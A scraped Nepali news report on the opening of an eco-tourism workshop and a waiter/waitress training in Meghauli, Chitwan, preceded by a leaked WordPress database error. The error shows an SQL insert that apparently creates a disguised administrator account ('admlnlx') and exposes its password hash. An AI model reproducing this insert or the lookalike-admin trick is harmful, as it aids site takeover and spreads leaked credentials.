WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bh6OTTjtWNkcdTsFZt89R7W41FZwA11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 04:25:02', '', 'admlnlx', 'admlnlx')
चितवन, माघ ८–
नारायणी नगरपालिका अन्तर्गत पर्ने मेघौलीमा शनिबार दुई वटा कार्यक्रमको एकैपटक उद्घाटन गरिएको छ ।
नारायणी नगरपालिकाका कार्यकारी अधिकृत रमेश सुवेदीले पर्यापर्यटन विषयक कार्यशाला गोष्ठी र वेटर वेट्रेस तालिमको एकैपटक उद्घाटन गरेका हुन् । दुबै कार्यक्रमको आयोजक मेघौली पर्यटन विकास समिति रहेको छ ।
आयोजक संस्थाका अध्यक्ष कृष्ण भूर्तेलको अध्यक्षतामा सम्पन्न उद्घाटन कार्यक्रममा उपाध्यक्ष हरिश्चन्द्र महतो, पूर्वअध्यक्ष इन्द्रबहादुर केसी, तालिमका प्रशिक्षक सुदीप भट्ट, चितवन राष्ट्रिय निकुञ्जका रेञ्जर छत्रबहादुर खड्का, राजनीतिक दलका प्रतिनिधि लगायतले मन्तव्य व्यक्त गरेका थिए ।